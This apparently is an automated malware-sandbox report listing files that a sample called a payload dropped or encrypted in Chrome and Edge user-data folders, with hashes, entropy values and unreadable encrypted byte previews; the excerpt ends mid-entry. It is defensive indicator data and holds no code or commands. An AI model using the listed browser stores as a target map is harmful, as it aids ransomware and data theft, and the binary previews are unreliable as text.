                                                                                                      Preview:.On.!~.e.x...w....wX....40.SLh.\...-&.5...d.b..............Y.!muy3.b..;.7.[..}..(-D.A`..|ItmlO.....Pu{....|m.B..F..,...'%xR.YWH.vh.%Qi&_........A....I.8..w.;.m.........D..~.....2.....>T..9.,N.../.M/7...y...N.t8.+e.L4.E..?&.......H7.E.....^.F...k`..].D.Vv..%.k..&..]..pv.A...N..(.........n...kH:.&...}!.f*r>...<.u..k.<5..QB..F..,...6Qb/.._.0.N...uq..y.3hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG.old

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):682
                                                                                                      Entropy (8bit):7.653775851889211
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:kxAHyrjPl/AT1bdj2Ghtmgoi/ktEsxYPPVMKTa+in4v6cii9a:U75AQItK1BxYPd9a54v6bD
                                                                                                      MD5:DE2587F2F5A1DF99510F9D631E4D1299
                                                                                                      SHA1:9FAC111CE96381F2C982CE3E4259E40AF2DA469E
                                                                                                      SHA-256:52E540CAFD15602CD3088BD8A3E19BAE4EFE982A962DD62F34606F3DC66B422F
                                                                                                      SHA-512:CC364CE734AB8DAF995B82CD02730D76EF816AD5E7C92107B226559CAAB6A8175B7A5FBA09D2301D98E7E099E072075A7ACC3B0813A7B450C672FE84CDDE20ED
                                                                                                      Malicious:false
                                                                                                      Preview:2023/.@I...&`.j.n.l..B&...........mB...V.,V6.N..\B./dEj.|=...4_a..y.......n.~..R......^..;.M........,dMW.;T..WP.s.A U.A.....8...Q...P.W.....-.....\.P.d...4.N..E.5.........2`......P.[z..gf.=..rq.Y.=.jE........'..!d...{.x;B.;...._x:..G..Dq\.o.N..i... .k3.W.....BI..sw'..[..[*W.{l........u..B....pN...E.b....I...1...6/.......es.\.@.T. ..^..!.Z,S.i..z....!..v.u.4]+Y*..k..Boo5.'uc.k.6u...l.....Y.H..2r./....k..4.Fho<.4.d|...0>2.T.Qq..].....{. ..Zy.. ..;...9.2i.,&..6....HF.c.....0...p.c.n..L.b..8..V..66..l'......f.(h....^..HR.......Z.l.1mJ........J)-...s....X..%4..0...xM&.D=.7..hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\000003.log

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):395
                                                                                                      Entropy (8bit):7.318975047065448
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:SCLqaCQDApjbYOlKVq8C4C4QDYoAoGSE7v6cii9a:5LqaCHNYOlKV8P4QkoV6v6bD
                                                                                                      MD5:6679854EA85348ECEDBD8973B7AB87EF
                                                                                                      SHA1:7A5A288BB4EA03448225AE0FA1C8B46C67C139A3
                                                                                                      SHA-256:F3C0662426BA1AF51776B0ED6560F35EAF92A92681AE77D03EEC24E5FDCF318B
                                                                                                      SHA-512:22D9E1C47EF44545DE767079DD75ECF6671BE4B6775635647F60EE7FC6DF596FA99AF6B1EFACAC58EB25B1028B8680A1EAA03FDB8D5D8A8BB7A4B438826BA957
                                                                                                      Malicious:false
                                                                                                      Preview:*...#.......".]...ArkR.H.-...........w.......A.10_..B-...`*.lu.n.x..~i.M..}5.@.....K.....6........B.(......+...F=...|...K..@.B#...>b...y ..]........o.....+..^%`.8.$.e"1.e.E_4..."..*$.~.v.E.h.*..1..\d..@.....D6.k;.[.Ivq?.?.......SCf.[Ag.to......F.a......tj....Pj.. }...lP%....v......r=J.....:......hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):29006
                                                                                                      Entropy (8bit):7.993613021632558
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:768:aiDaclhs+Sj4a0Z4juVfChqJSPZ7SOc91x+536rsmfDloxKW:aiDW+jaxjyGqJSB7SOceKTfDl0/
                                                                                                      MD5:7F57C46BB37A3000A744DA013F893439
                                                                                                      SHA1:AB7D4850C8E3C593467670B1A6FFE8C35A8989E7
                                                                                                      SHA-256:81EC964AF7C5500DE811FD13FD41B1D54CEC350709A00D81CC67D8AA384AD064
                                                                                                      SHA-512:2A5DC06436A4AA9C479494706FF4C408BD0C4F395084C0BFF742CDF724466EAEFD8FC938D438FF8C1C7F45A81A076B63B8E2D487FF88C3F30B93EC534107DA5A
                                                                                                      Malicious:true
                                                                                                      Preview:SQLit..7t......(...B....uP..%~.r1...".bt.~.|...r4P.M!.RR..w&d/t.R...0.X2..o.!.1...^.(Cg...|.-.....t.kE...e=.!9../...>`...ip?.x..W......=;q..>..s.3m.f.#....#......[.*.NF.^.Y.7....4.y.....Y....d.x...U.....m.>..k..3x.J..>..3..5..O^..S_6I...uZ..[.wV....,..+.R.j.o.sMz..g%68....w...........8.. ...0=.r6...Y.P*=.....u...X..Kan.......'jC-E.......^5.W..)Nj=.L.w0.j.N;fe.X.%)`/X..u@O.2.........1pC..QTS.....:..=....{.D.....T5......#@...u..:.5....@.#.'...E........#../.L,....I6BC..FFZ..e...X...un..F......e...Q'h....j.....P..v.-.V..NrG.d-1....m.A"..qzI.F....7]4....WHF..(.p=...<.....T....T..8]..7...c..y!..N..$.K..J.p.9.C..B....t6..oPM)..aV..x........K....)G0.....$Nx.P#.$;......].._Y.^.ce[:...luFQ.9b..o...,.).>.<...!I...}......#.p..T.?.....$*.}.^..0.......s.Sx.b.e......r.jeQ.F}.K.dF..3.O..&=..."..........):...n.........^.b.cZ..I.q^.K...r.8..c.}.O.s.A..-<.>........tlT..#.Jp.O.H..e..C|tp...q.Qh].t.D...m.@(..[3.s...I..@.t......?.y...B...s...m.VD..[..&.

                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):77068
                                                                                                      Entropy (8bit):7.997639131961608
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:1536:y2L5ocBUuD2GJ/WA3Rxt+dJ0Ijkm97COG5AwS9r9A7lZ3zQ2PxKgH:y29v1D24JBxtMhkm94AwSk1JNH
                                                                                                      MD5:5D73DA674F64240CD61A5523C9FB5382
                                                                                                      SHA1:E085C1331D9E8503BDE1E0A8866A67B1701BFFE1
                                                                                                      SHA-256:D2307D4CA9533D9B0ECC50CCC87F7C37B9E324C193EEEC82DDFAC05BAA48C53D
                                                                                                      SHA-512:A64FACEAD85F9188ABB8D2054BCED5F9605B6570FF6821DD3E53D9636F0A8A0DEE567F59971C1A55995C2C4F0F69A51620709646B5FCB126598503767B874BFD
                                                                                                      Malicious:true
                                                                                                      Preview:A..r......./.0...f.4....z..!.O.....sP.d....fc..\.i.>Jw.....r....1[!0.....h...[A..<+.k.=......|..y^h5.6.!.97...........h'..*..g.|l.z.pd..gIo.^.Lo+m.'.....b-.<..>.Rf.......9]..?../.!\..>.2.\aK. .w.O..$...A....+...S.r"...n.@.:.j}%..F....C..4...6.4..!..Z....n...h...Z...o+...e..S{wJ....D....".`Ux.w^.V+B.h.{......n...~G,..Tg.^.D.Se.v....]..F..........)?...|_.4Kp.......6r#...l.f.+....n.)....Gg(3|F..6.L.H...8*.}....iT.gC..v:P.T.m.J.]........Ms).b.}...VL#..F....7.Fa.....d]...W>...........O..(.P....;1\.x.U.n.g..|...DO.^7..}.|.F.m..;.y.h..5.?......i[*...6Isj.i...( 1...X&c.1[>.~V..)C..m%..k.Hz...y|..4...?.....d.G...........Ucl....G7.....cb.id..4fw...Mf..we.n.x9q..i.....t~.O0Y7........Y.>.M..:*.q^.......e'K.Xc.Gc/.e....%......p1Wdf@.1..i.du.*...F..C..1..._.~.0&)g&!.k.../...V};.f.a.....g.t.9.....?...."<...1X.Z.`..)...T.k.."P.....@w...........,.....~...T.....:...{~..{..m.%A....u#.hD.......a.gEn.U.<m+BHP....0X..;...Sa..~........VN)7.....R.(................

                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\LOG.old

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):654
                                                                                                      Entropy (8bit):7.693223391059311
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:k7+7zlZIelMxLm2ZH3H4MzroKz6dvJ3UqlHFumetgadRxZrqv6cii9a:A+7RZI26y253YMzpzkx/JetHxlqv6bD
                                                                                                      MD5:F1C34BB0F0F927761D221B35200A61C6
                                                                                                      SHA1:651D244ADE60458C78628B15B0D22DC20E952CC8
                                                                                                      SHA-256:5C2D2D36549B000AAF328737E7640C8D678F056FFCA5CCD19773087622F7B25F
                                                                                                      SHA-512:8C81939B51FF48AD08020E91CBF6D95F2D44AC1BBDE6C761C7511AA3B9F8F0652883B939F3BAC97DF78CA0B0630A1E81F79B3F1FA85DA03A0DB2D0C30EEF4AFA
                                                                                                      Malicious:false
                                                                                                      Preview:2023/.k._..~.[l.....+.E`..'...@....wU.h..G.F.....e..2.......x^H..c.....1.Tm_T..\w....`..Y...i..u.......|.6..dK..]..,jP.P...f1.....{......5...m...|.M....)...........F.M.U6.F.e.U.[X.D!...k.Xd...o.....P.,......=s.<...<..-1~{j..bn%.....4Wjk...L................9v......[S..jId.....H}.@]..#........%...$........+..G..9....`...u5..i..D.im....!.Y.~....{b..q(..W<.}.V.U..3e....?.Zo.[D.....s)Tq.2.....;..)......3./...9...[..U.}...S.?.-.....8. 0../......V.H..,.o.6..F....i.(":oz....U..R.J...ON.<.F.K.%`...yBGE=.."v...LL.%...9..i.J\bK_.h....R....6...hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\first_party_sets.db

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):49486
                                                                                                      Entropy (8bit):7.996385318955644
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:1536:bsLOJ7V+BMUMIcdaK2q3rTDeqW1V7HCO4R:bX7wSISf3ObwR
                                                                                                      MD5:7CF2124EAFF1B49F1708842F17ECF3B5
                                                                                                      SHA1:9733F778629FA54B5E72595FD76A0E8CD1AED120
                                                                                                      SHA-256:D27BF567D5D8DD04E593B29CF50DFDE6A0960B7A7C7C551EFC749FF513563AB9
                                                                                                      SHA-512:6D48964BBAD7B7152CE0E5514F2116FA332055AAC0CED7B8897113779F4C50E1EE309354ED2161110295CAC04495ED898B44EF1379EA6A8E48BBA22A92986CEB
                                                                                                      Malicious:true
                                                                                                      Preview:SQLit...Z....=.H..)5.o${..|.P.N/.xE.E.......?.FE......X......B..b....i].[U..R...;.O.p.v...BY.%~.M."...<v_`.<.>.;..e.U,t.%.2[.`],.:..)..>..6...{..?....-jp..5Gj....f.....!.....F.!..L..f|B.f..9.z.t!v.....h'..-....?.i...|.No@...~.$..(....Qf`...V.l.L.}...<`Z.....U.O._.?.....Up..W..^.eL.............1..I....F.nD9.i...Xn=.8...j_j....4...U.E Vl..}^...hV..L<..2|G.....2...Y'W.:.}..V..W.r..mbf2.........T...."....B.<7.T...P......"......=J.Yp......fme.Q...y.....B5.Pz9......c...00i...-.:. 2.,q.@ZH.;.;._w...h.G~y..../i....G.\!)........M....`9>......&+.v.Q.0\.P%..usA..Di....qoO....<....~.?...X.uj..u.._R.....]?e..1.....|.z.*d.'h:B~q........u.I.v(......(!.......W..{..H).U.P`.yU}.?....J.P.:K...T./.....~.'.....d..%g.,.Z..`./+..;}....C...Xk7.1..O!........V......P.....q...Qh...6?JO..~.k..y.........r.F5.u.se.....h..!.._.S..C.6...T"z.|z......$.>vq.G..#$83..h......X...D..%..Mh..P9.L..j<$...6..%.Z.M..Ku8.........`$..25.... ..p'.F%.<..za.....T~.Q.t.ZV<..A.#W.....@1=Kb.Z

                                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\unarchiver.exe.log

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):354
                                                                                                      Entropy (8bit):7.354891313027574
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:QRmuin+i5pBsFqr1MB3JeguOPr4STCzcb7OnpnZoxqEAonaox2+i9HpEOBNJ8Frf:Q9i5PlYQos0CHnvoxq0OHfEOBUlhinvk
                                                                                                      MD5:112C913AC20DC5329BEC7A57A5DEBBC6
                                                                                                      SHA1:37F25E5EB1173677707D4CB265734FE7995C0E9C
                                                                                                      SHA-256:8FCAB256F7C4BA8136CAD2466509BD6A5329964C916A7AE7CFEE7E38AB72BC10
                                                                                                      SHA-512:871F23D461CAF663795ACDE6F0731CDA05BE112A58ACCB47BDACF3ACE55ACFF89736C37D88A2BC045D930562EF5037E808762D1BA7DE651A517BD000EE6305B2
                                                                                                      Malicious:false
                                                                                                      Preview:1,"fu...../.t.].Y'i1|PM......uvG.....z?..ec7{^...&...:..S.}.u.{<.[...:.....MSx~.6w....K.....^....L._K.._g...LK.|......f*K.h..F..V.v=.r....$.G...aM.(B%t*....=.9.3\..c..Y1.-..5n.kS.yx...i.9v.Z.N.....2.....A.......rnna..a....<.`..d.$W.#...WPS.){.+5.?S...3..Q...4.hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\InspectorOfficeGadget.exe.log

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1210
                                                                                                      Entropy (8bit):7.821236733660461
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:Fy/Ry71tXwdrSlbWFWV9HFOk1qWkSE7+PaG92LxCiUoYv6bD:FMy71DQs0k1qq7aqQxVYwD
                                                                                                      MD5:8231D86C60B04046AD319E4243650A90
                                                                                                      SHA1:41AD712D15B91E1EDDD95949976E5396342B3121
                                                                                                      SHA-256:36D573BAD92F907325528C971833824BB08A50DB4B7FBCF779AA399A3B08DCD2
                                                                                                      SHA-512:D3ACC440E39A2C0A3FFFCCE4D194C7001FEA42E04E5A2CE9CA129D279CE9AC340BC3B430527DB7884CA86E6CE2BD50CEADE9D382770E60804383D1B7293843E3
                                                                                                      Malicious:false
                                                                                                      Preview:1,"fu...Y.3R.^E3..&.SN..PA...c}.0+....hA`.{4P.E.d.].....G.`...<&.E.>.<.N...74.0......!...$......\..]....t..).......S....F.@.o~.....j...n......o...4j1...\.YB....H.di.....3...U..........k........$^..4q..;..]q..:.........M......x...3....!...c%....).N....u.....S.D..X]..ET........:....U ..jB.zY.....7v.a'?.`m.I......?.."...........f......-.|.7.?o(.-$3.a.e...k..R.).1y..'.mB.;k...uO...YgFD.....~....,.6.R.4.|..!K....^....(.)zM.h/...vm.S..D.~.e.."~..<fx...-....#z&Mt"=.....R......*..X..2y&T.*2e.k)g..k..*q...v..v...]...,./......R.d....2.......j.^......K...j%.,l:8|.e..<.|.\5VO8.&(RF...}....;..m..bw.!..r}}..?....M....l.-&...q..7..M....r..l...8....r....,(..B...d0/....`....o...E..u....+.^fF.,...6q...9q.M...P./>.2^......+.\[t.Qv..8>6{k...r.d.3.U.D...C.e@9...D..de.l..f...c5...m)...3.*F...T9l...:.Dgp.A9;)..}.h.(.(.1e.<.K....Evl;>...,.:.2v.N.......%..K..4....a.-. .Ut.u.....BR..CS......%qH.~...N*......|..C."._(..LM V^..l...`..........'.H.~.@k...!...5.Q{.9+(.V.(.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CrashpadMetrics-active.pma

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):16718
                                                                                                      Entropy (8bit):7.988196790400042
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:RdfnYTsGwEOR+H1Lvqhi6x/ydCALct60GeVyl80bd/IIa+PCOgACOpBq:RdfnYghcH1vqhxWCFluvbJIIaE1dC
                                                                                                      MD5:9C32E0B044CA791E31FF11CF5EBE29DE
                                                                                                      SHA1:4CAD318217C8A3EF2546D1FDA6FD2F717A309A40
                                                                                                      SHA-256:8991846BA4C435D5CBF2DFCDA17619A1B107BEB3183748A117C619274B220767
                                                                                                      SHA-512:66ADBA57C7BE75BA4EEC8E3CBB902EFF5611F3809F8ED81DE33957F66C7AAF3C33A0399893CD4EE233EF2340AF6E084351D54728D77753F0FE2EDDE18C022DAA
                                                                                                      Malicious:false
                                                                                                      Preview:...@..\>..W.d....zuo..w`-mx.PY`gM....h.]...=Z.*o...x}.=..7..$.|.T.l.q.r.!9f9.........{..b.. ..g..;G..ab'l.`.m...Mu.u.(g.......D%."...T~.U..r..>5.n....C3`.~.S.".._......ME*..T..}i...3.^..;..........pe....m.R...`.h..~n.*......R..s...!.............;..i<..!...y4lA.B.<..C........1.D[.t..`.......S.....K.|...:.S...x.....p....#/.`......Y....!]......x.n...zT..".I.......X..N.d .="..(h`......v......C.......c+]..AT.E=.X.M.G.....[.b....vQ..g6d..X+<Gc......L.....`...+S..X.M...JA...D.....r.Q.....!B....@4.bu.....L..z.s......5B.I......wi..*....#5.~.q.._.......V^.'.)..2..o.....Xb;%SU.HkI?....#.h#"z!....?M..Q.[...R6~.9.E=|..........F%P;...S.g...?...XT;.....s....,.7............j......F...D.M>..;(l.UK.5...@.......h....I.5..X^...m....^6fu6E...0...*....!.....ZTk.x4....._.../sFR.VPC.G.V...<.Z...=t....9....2)_..W....>93...C....{i.>...v<.......=.o....&../q2.]..p...qqn...`....H.....|.=.F.k.0..,m5.v...LR.z..?/.......[...|...95......0Pb...r>...tyOC...wP4.s..q..t.*).

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):904
                                                                                                      Entropy (8bit):7.732069387824715
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:/1jNgRkhwB8YUdRVbRnjecel4qpakl1HMzIfQv6bD:h9hmJUZRKtDldM8QwD
                                                                                                      MD5:DF0DE913B0A65430712254178F8C612B
                                                                                                      SHA1:A0D6C15F982A772AD661F150285340542D5FA92C
                                                                                                      SHA-256:A69E15E6A6E1D1A372887880E1F984E957E17FFD4CA17960EB296EA33B78AA6A
                                                                                                      SHA-512:51262629C54F4EF82F7177108EB1EE4206895408C3E4D8DCC54C74C2ED783AF1C35EC1888FBC05193B2ED8F5073745FCD0A6AEC683E0DBDC24C0D902FB9CFCEC
                                                                                                      Malicious:false
                                                                                                      Preview:.f.5.L.{"h);.P..4../-K.{..K.......0U=.D..1p...]/...?@.....:{H1...b.W..t.#.o...j5_@..^..0. fl!..\..z.....O.....R..NbEp..%...:.......KBcl{.?.Z+3..n..@......&..D........l.U'.a{Q..^.q;I.7-..p.H.q..=.dP......S5....7..6.C.+.....E.....~.sr..Q.H..i7..`..x..Z...o....<].B|./..b..gsp.x....p.<.....K.<....H&.7..@...Q^.o.XH..L.zF..M._0:.*-.......Yn....qk.....N.SK..F..4=.q.*..w...^..<.....W....I.B... ........y..V.t...Q.....l....t-0..=Hq.4.,->.0p..9...... ..{.../.ye..R..e..^.O......RG@.i..g.".jZ.....B....G^:..%!.8..m.....C......m..**.}...-.q..CYN7.C.....>8..jYu.wW&....w....>,u..e)&,4K*"8A.F..P.o7......%.....j..n@......2)>...g2o.#.....?$@FF.=c\|H..1.V.G.'....^.y..a.f.....F.R..|...O.a...'t..Xc.......{.....4..f..........)..\..=...Xe.....Z^......:t..'*...#.(=q1..?..$...3.j.._.U..b^|......hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):490
                                                                                                      Entropy (8bit):7.564528247551813
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:SHzI0g3xKon+kFG2ZNfsEM91HV4Gfoolm3E3sKKUaHv6cii9a:gUv6aNfaV4GfocdsKKUaHv6bD
                                                                                                      MD5:4BC0E3CE8BEEAEFC1B4BACB4AA40F636
                                                                                                      SHA1:50BBBB7A237511500DE7E3D58B499F345D515442
                                                                                                      SHA-256:34995C952B361274615B21B2E34D77062830AFEF70F60C9CAE602744AC740304
                                                                                                      SHA-512:B894DB613135D33CF4FAA45FF9EE39A76D40FA9D9EF0B58B5EF87C1AF4B2328D796BCDB05C97F1B01A926758F2A123579DA4D8C52AE3F012FFCC919B0DC70BCD
                                                                                                      Malicious:false
                                                                                                      Preview:*...#B.q-..s.........?..(.a.jv..}...Fp1\7..G...v.[.Q...7...=k..q...w...!.d..A....SN*...xW...mo.....`.T1...p.^..V.b..[^.U.c/....:....S.....Ltx.G.TLi.....#<.g...u.W...|...O.m..Wzg....ED.C#.y.9.W......7.AF.L.R....V..{W.Z....]B.=L...{....%.K.,..... R.=f...gi...=.kQ..^Oh..g.....*.Np".......^..&..;D..I.Y...!.....^>.*,h.....D..0.e .K..y.=.O..M...>.1...B......f..bOG........5e...;..........R......FhZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\000003.log

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):374
                                                                                                      Entropy (8bit):7.335126906775945
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:xW6NCsxBPUGfCPKch+qhK1qCR8W2Fg024Htm1XXvV9Wcii96Z:PxBPUqCPbsqhK11RHQxzH0v6cii9a
                                                                                                      MD5:7AFAB3F4F56870853888666AB5B10FD1
                                                                                                      SHA1:09C0C7589D6839232EA958E72C046F4D7A851623
                                                                                                      SHA-256:0C6810C4808CE7CA7E4CFFC84A55BE1D5D925310574A61296D9AFF40D8D4F6E9
                                                                                                      SHA-512:4B89C1D2701F86B8630309904ECE375527F3108DD7390A12CFCA3B3A990157BF6A1D16FCF54DD039805038C54D7B3A7B3A6C40EE9A7E9F6DAC7F5E925DE54FB9
                                                                                                      Malicious:false
                                                                                                      Preview:.On.!.3..bQ..^.>*-n..yBA?.l..,..v...i.L,IB.1..........t....+).......-.. ....8}..'...@..TC......M3.$0*....c2......K.|.i.....F.>FG.CKk....L...3..o...u..b.....*.G.c......C./J.r|..*.D..0.&./....wA....V3.$0....I.g...P...T.y..Q.w.k.p.a=.I.z.?#.s.......D..j.....az....W..i.2?..%.*z.........lhZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):684
                                                                                                      Entropy (8bit):7.6300351706128176
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:kt0Kyh1FcrcSpjzjWzKH7hCfNGrDs7NrHtiGdm5yxIFwepkpYoyMgUE7v6cii9a:w0KyjiwSpnjTVwGruFNiGY5yxgwepibJ
                                                                                                      MD5:141DA62E37F321380501AF8B5F73B3D2
                                                                                                      SHA1:E1F343016EF0255A9AC23F90C2E5E7614550EA6B
                                                                                                      SHA-256:43CBBD2CD5240DAE59E304D70E73A30AAEE341180E3CBFC9F85558988CF44842
                                                                                                      SHA-512:C2C4B86A73C1728666CB792BD68B990A28E7BC23B86C48641212BA3A60B31F55B2AF034533692A8DF4CC400AC4C7CF068357E9E266A1258292D83C5D4EA1A3C1
                                                                                                      Malicious:false
                                                                                                      Preview:2023/...c.*...6...,.A.....y#.Ws.....W.....S/.K.+..)qq........L$..o..A@.Xct..~Z..NvU.$..6NQ.......1C.M.....w..r%..)..D.....$.<..G...1.....0p..}.3....2.q&.tQ...q.-......}...A....s...U}E../....].c>.i.......+:..7~..-0.b..1...Y...w..L?7'.J1..4.....k@..<.sT4-.....nU_..-b.$......A).U........d....b.......8Y2.........%o..X.E.^.2.7.=5.r..8~u.o~.(@...SS..^.Q......a....)'...b..~Q.Y.Ar...(.K....8.e......*../.....:.E..Qr.=..#=..j.`.yG4..$.3YS.VV...8..-..0...FN..S[]..%..N.%.h=j.....-$i..^...].....?le.p.....Ge..A.Y.&.".qR.RN....9...M.3....N..8.,T.[.sMr$.7..x.....L_.......T...)AhZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):395
                                                                                                      Entropy (8bit):7.398951550866966
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:SwmLurZKU79EsTS5ok6zhAs9MMreo0nv6cii9a:tdP2sTS2ztzMMrMnv6bD
                                                                                                      MD5:F0BBCAA936895D1DDB18A2EA069F62D6
                                                                                                      SHA1:62B975EAC6A0AC571F32983DA6BDAB6A465AC759
                                                                                                      SHA-256:2186097F1B7C8086C6F591E94B9347188934BFD4D0517327C7D6E03C1828B377
                                                                                                      SHA-512:932A793E32A470971C211C2894B86F026D7AA24304DFF8B42722C4CADC6D72563CEF5CA235231B1631562878CC2137BC6BAB171B9FDB20AEA668AEE837B6C884
                                                                                                      Malicious:false
                                                                                                      Preview:*...#....H.'.Mc..|..b.0../,...w....{,.*...............v...d.$.e.lZ.........y.l..T2...{...Y..,._....kI~'..|.*.|.......@=..._...v@.|L.d..m9P...m....G.:t.J....gx...&......y......gT.u._.m..5BH..../ad.....%.n7TZ...rS...4.....3....x.S^G.#QK#>N.{.f..PC.....Lm.K....8...q.}.T../....q.Q.@.....+;|...O6#.....ZhZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\edgeSettings_2.0-2f9188b68640dbf72295f9083a21d674a314721ef06f82db281cbcb052ff8ec1

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):129419
                                                                                                      Entropy (8bit):7.998394536777608
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:3072:Fnp+PlydCfLeB5T6P1rmcFNBgy+qsJktNCsSS:lppCq3+t3/UkqXS
                                                                                                      MD5:2338FE415F764D6E5B3F25695315E865
